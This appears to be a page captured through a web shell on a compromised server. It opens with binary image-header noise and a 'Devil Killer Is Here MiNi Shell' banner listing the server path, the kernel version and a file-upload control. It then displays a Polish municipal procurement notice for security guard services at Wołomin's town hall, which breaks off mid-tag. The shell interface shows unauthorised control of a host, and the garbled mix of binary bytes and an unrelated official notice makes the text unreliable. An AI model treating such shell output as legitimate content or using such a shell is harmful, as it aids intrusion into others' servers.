JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241202/0062661401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi ochrony fizycznej osób i mienia w Urzędzie Miejskim w Wołominie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wołomin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ogrodowa 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wołomin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wolomin.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wolomin.org</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi ochrony fizycznej osób i mienia w Urzędzie Miejskim w Wołominie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-da2aefe9-0dbb-4b8d-85e4-8dc3c0be38f0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00626614</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00037597/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Świadczenie usług ochrony budynku Urzedu Miejskiego w Wołominie w 2025r</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wolomin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">za pomocą platformy https://platformazakupowa.pl/pn/wolomin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z rozdziałem XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z rozdziałem II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z rozdziałem II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.41.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje wykonanie usługi bezpośredniej ochrony fizycznej osób i mienia składającego się z budynku Urzędu Miejskiego w Wołominie ul. Ogrodowa 4, jego pomieszczeń oraz rzeczy znajdujących się w tych pomieszczeniach, w tym pomieszczeń archiwum, garaży, węzła cieplnego, magazynów itp. wraz z rzeczami w nich się znajdującymi, jak również terenów do niego przyległych wraz z obiektami i rzeczami na nich się znajdującymi w okresie obowiązywania umowy. W zakresie ochrony mienia Wykonawca jest zobowiązany w szczególności podejmować działania zapobiegające przestępstwom i wykroczeniom przeciwko mieniu powierzonemu do ochrony, a także przeciwdziałające powstaniu szkód wynikających z tych zdarzeń lub ze zdarzeń losowych oraz niedopuszczające do wstępu osób nieuprawnionych na teren obiektu chronionego.<br/>2. Ochrona musi być realizowana:<br/>1) poza godzinami pracy Urzędu Miejskiego w Wołominie w formie jednoosobowego posterunku w godzinach:<br/>a) w dni robocze :<br/>– w poniedziałki od godz. 17:30 do 07:30 dnia następnego.<br/>– od wtorku do czwartku od godz. 15:30 do 07:30 dnia następnego.<br/>– w piątki od godz. 14:00 do 7:30 następnego dnia roboczego.<br/>b) w dni wolne od pracy wynikające z pięciodniowego tygodnia pracy, soboty, niedziele i święta całodobowo, do następnego dnia roboczego, do godz. 07.30.<br/>2) przez monitorowanie sygnałów alarmowych i podejmowanie odpowiednich interwencji przez załogę dwuosobową, całodobowo przez okres obowiązywania Umowy.<br/>3) przez monitorowanie i obsługę systemów sygnalizacji włamania i napadu SWN, telewizji użytkowej TVU oraz sygnalizacji pożaru i oddymiania jak również podejmowanie odpowiednich interwencji przez pracownika ochrony, w trakcie wykonywania zamówienia.<br/> 3. Do obowiązków Wykonawcy związanych z ochroną w okresie obowiązywania Umowy należy w szczególności:<br/>1) otwieranie i zamykanie drzwi wejściowych, włączenie i wyłączenie windy osobowej od ul. Ogrodowej, w sezonie zimowym odśnieżenie schodów, sprawdzanie stanu krat zewnętrznych oraz załączaniu i odłączaniu istniejących systemów alarmowych;<br/>2) dokonywanie obchodów ochranianego mienia, celem skontrolowania prawidłowego zamknięcia wszystkich okien, drzwi zewnętrznych oraz krat zewnętrznych;<br/>3) dokonywanie nie rzadziej niż raz na godzinę obchodów holu i korytarzy, celem skontrolowania stanu bezpieczeństwa pożarowego oraz sprawdzenia, czy nic niepokojącego nie dzieje się na obiekcie np. wygaszenie zbędnego oświetlenia, skontrolowanie, czy nie przecieka woda w pomieszczeniach socjalnych i sanitariatach itp.;<br/>4) niezwłoczne powiadamianie Policji w razie usiłowania dokonania lub dokonania kradzieży, włamania, napadu, dewastacji mienia;<br/>5) niezwłoczne powiadamianie Pogotowia Ratunkowego w razie zaistnienia nieszczęśliwego wypadku, jak również usiłowania dokonania lub dokonania napadu, o ile zachodzi taka konieczność;<br/>6) niezwłoczne powiadamianie Straży Pożarnej w razie zaistnienia pożaru lub stwierdzenia próby podpalenia;<br/>7) niezwłoczne powiadamianie Przedsiębiorstwa Wodociągów i Kanalizacji w razie zaistnienia awarii instalacji wodno - kanalizacyjnej lub stwierdzenia takiego zagrożenia;<br/>8) niezwłoczne powiadamianie swego pracodawcy, Naczelnika Wydziału Administracji Urzędu Miejskiego w Wołominie oraz osoby będącej przedstawicielem Zamawiającego w sprawach wynikających z realizacji przedmiotu zamówienia o niemożności wykonywania obowiązków przez pełniącego służbę pracownika Wykonawcy;<br/>9) sprawdzanie czy osoby przebywające w ochranianym budynku poza dniami i godzinami pracy są do tego uprawnione;<br/>10) prowadzenie książki dyżurów zawierającej imię i nazwisko pełniącego służbę, godziny pełnienia służby, imiona i nazwiska osób przebywających w obrębie ochranianego budynku, poza godzinami pracy wraz z podaniem godziny ich przyjścia i wyjścia, przyjazdy patroli interwencyjnych, inne istotne wydarzenia i spostrzeżenia związane ze sprawowaniem ochrony mienia Zamawiającego;<br/>11) podejmowania wszelkich innych niezbędnych czynności, mających na celu zapewnienie prawidłowej realizacji Umowy;<br/>12) bezpłatne dokonywanie kontrolnych objazdów chronionego obiektu, przez załogi interwencyjne, co najmniej 2 razy w godzinach od 23.00 do 7.00 dnia następnego we wszystkie dni obowiązywania umowy, a w dni wolne od pracy, niedziele i święta także co najmniej 2 razy w godzinach od 7.00 do 23.00, celem sprawdzenia stanu ochranianego obiektu. Pomiędzy kontrolnymi objazdami wymagana jest minimum 2 godzinna przerwa we wszystkie dni obowiązywania umowy;<br/>13) bezpłatne wyposażenie ochranianego budynku w radiowy system przeciwnapadowy, łącznie z trzema pilotami na czas realizacji zamówienia oraz wyposażenie pracowników Wykonawcy i Zamawiającego w przyciski antynapadowe, współdziałające z zainstalowanym systemem przeciwnapadowym i środki łączności bezprzewodowej oraz zapewnienie transmisji sygnału alarmowego wyemitowanego przez pracowników z chronionego obiektu do patroli interwencyjnych. Czas reakcji patrolu interwencyjnego od wezwania do przybycia nie może być dłuższy niż 12 minut w dzień i 8 minut w nocy;<br/>14) wydawanie za pokwitowaniem, uprawnionym do tego pracownikom Zamawiającego lub osobom upoważnionym oraz przyjmowanie od pracowników Zamawiającego lub osób upoważnionych kluczy do pomieszczeń specjalnych, znajdujących się w chronionym obiekcie. W książce kluczy będzie kwitowane, przez ww. pracowników pobranie i zdanie kluczy do pomieszczeń;<br/>15) kontrola i ewidencja stanu kluczy do pomieszczeń biurowych znajdujących się na tablicy z kluczami oraz ujęcie w książce dyżuru informacji o brakujących kluczach na tablicy; <br/>16) kontrola ruchu osobowo- materiałowego poza godzinami pracy Urzędu;<br/>17) prowadzenie dokumentacji zmiany;<br/>18) informowanie uprawnionego pracownika Wydziału Administracji o zaistniałych wydarzeniach w obiekcie;<br/>19) składanie okresowych i doraźnych meldunków przełożonym oraz upoważnionemu pracownikowi Wydziału Administracji Urzędu Miejskiego;<br/>20) obsługa i kontrola szyfratorów systemów alarmowych Urzędu;<br/>21) w przypadku usłyszenia sygnału dźwiękowego lub świetlnego pracownik ochrony zobowiązany jest do postępowania zgodnie z instrukcją postępowania na wypadek alarmu.<br/>4. Wykonawca zobowiązuje się:<br/>1) w przypadkach, o których mowa w ust. 3 pkt. 4-7 Wykonawca zobowiązany jest do niezwłocznego powiadomienia Burmistrza, Sekretarza lub Naczelnika Wydziału Administracji Urzędu Miejskiego w Wołominie oraz osoby wskazanej przez Zamawiającego do kontaktów roboczych, w sprawach wynikających z realizacji przedmiotu zamówienia.<br/>2) do wyposażenia swoich pracowników, pełniących ochronę w odpowiednie umundurowanie, identyfikatory z imieniem i nazwiskiem każdego z nich, środki łączności bezprzewodowej i przyciski antynapadowe – działające na zasadzie fal radiowych oraz latarki elektryczne. <br/> 3) do wyznaczenia koordynatora, uprawnionego do kontrolowania pracowników ochrony, nie rzadziej niż 2 razy w tygodniu, co zostanie odnotowane w książce dyżurów. Do obowiązków koordynatora, będzie należała współpraca z przedstawicielem Zamawiającego, w zakresie całokształtu działań związanych z wykonaniem umowy.<br/> 4) do pokrywania kosztów za przeprowadzone rozmowy telefoniczne na podstawie rachunku w oparciu o fakturę operatora i biling.<br/>5) przedstawić Zamawiającemu „Plan Ochrony”, określający podczas całego okresu realizacji zamówienia organizację i taktykę ochrony budynku, zostanie on bezpłatnie sporządzony i dostarczony Zamawiającemu przez Wykonawcę nie później niż w ciągu 7 dni roboczych, licząc od dnia roboczego następującego po dniu podpisania umowy. Plan Ochrony zostanie zatwierdzony przez Zamawiającego w ciągu 7 dni roboczych, licząc od dnia roboczego, następującego po dniu jego dostarczenia Zamawiającemu.<br/>6) posiadać polisę lub inny dokument ubezpieczenia, potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w tym w zakresie przedmiotu zamówienia na kwotę stanowiącą równowartość: 3 000 000,00 złotych polskich, przy czym ubezpieczenie na jedno zdarzenie, nie może być mniejsze niż połowa tej kwoty oraz zobowiązuje się do przedłożenia Zamawiającemu do wglądu, oryginału odnowionego ubezpieczenia na kwotę stanowiącą równowartość 3 000 000,00 złotych polskich, przy czym ubezpieczenie na jedno zdarzenie nie będzie mniejsze niż połowa tej kwoty w terminie 7 dni kalendarzowych od daty jego zawarcia, w razie wygaśnięcia w okresie obowiązywania Umowy, dotychczasowej polisy lub innego dokumentu ubezpieczenia. W celu zabezpieczenia realizacji zamówienia Zamawiający żąda aby Wykonawca przed podpisaniem umowy przedstawi dokument polisy lub inny dokument ubezpieczenia w zakresie prowadzonej działalności.<br/>7) przyjąć na siebie odpowiedzialność materialną za straty poniesione przez Zamawiającego w czasie pełnienia ochrony, wynikłe z kradzieży i kradzieży z włamaniem, które zaistniały w chronionym majątku Zamawiającego, w wyniku niewłaściwego wykonania ochrony, a w szczególności nieprzestrzegania planu ochrony, zaniechania strzeżenia obiektu, wprowadzania się sprawujących ochronę w stan, który uniemożliwia lub ogranicza jej pełnienie, dopuszczenie do chronionego obiektu osób trzecich oraz innych przyczyn, które w sposób oczywisty wpływają na zniesienie możliwości ochrony lub zmniejszenie jej skuteczności.<br/>8) przyjąć odpowiedzialność dotyczącą szkód w mieniu Zamawiającego, które znajdowało się w pomieszczeniach lub na terenie zamkniętym, a w przypadku powstania szkód w mieniu znajdującym się poza zamkniętym pomieszczeniem lub terenem, Wykonawca ponosi odpowiedzialność w przypadku nieuzasadnionego zaniechania ochrony tego mienia.<br/>5. W okresie obowiązywania umowy Zamawiający ma prawo do bezpłatnego, kontrolnego wezwania do budynku podlegającego ochronie (nie częściej niż 3 razy w miesiącu) patrolu interwencyjnego, celem sprawdzenia sprawności działania ochrony. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie wybrana oferta z największą łączną liczbą punktów. Sposób obliczania punktacji: Po = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający wymaga, aby Wykonawca posiadał aktualną koncesję MSWIA na prowadzenie działalności gospodarczej w zakresie wykonywania usług ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>4) zdolności technicznej lub zawodowej:<br/> a) w zakresie potencjału kadrowego – Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, tj.:<br/>–	co najmniej 4 pracownikami posiadającymi minimum trzyletnie doświadczenie w zakresie przedmiotu zamówienia, którzy zostaną przydzieleni do Urzędu Miejskiego w Wołominie i zostaną przeszkoleni z wiedzy o obiekcie oraz systemów alarmowych. <br/><br/>b) w zakresie wiedzy i doświadczenia – Zamawiający wymaga, aby Wykonawca wykazał,<br/>że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał, wykonał (zakończył) co najmniej trzy usługi polegające na świadczeniu usług ochroniarskich dla sektora publicznego o wartości minimum 150 000,00 zł netto każda i posiada z tego tytułu nienaganne referencje Zamawiających tych usług, a czas realizacji każdej z usług był realizowany przez okres minimum 12 miesięcy.<br/><br/><br/>c) w zakresie zdolności technicznej – Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje lub będzie dysponował odpowiednimi narzędziami, wyposażeniem zakładu i urządzeniami technicznymi, tj.:<br/>–	Radiowy systemem przeciwnapadowym do monitorowania chronionego obiektu wraz z transmisją sygnału alarmowego wyemitowanego przez pracowników ochrony z chronionego obiektu do patroli interwencyjnych i zmotoryzowanymi patrolami interwencyjnymi, wyposażonymi w środki łączności bezprzewodowej z czasem reakcji patrolu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacja o podstawie do dysponowania tymi zasobami- załącznik nr 3 do SWZ;<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego , w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 4 do SWZ;<br/>3) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - załącznik nr 9 do SWZ;<br/>4) aktualną koncesję MSWIA na prowadzenie działalności gospodarczej w zakresie wykonywania usług ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 3 000,00 ZŁ (słownie : trzy tysiące złotych 00/100 ); <h3 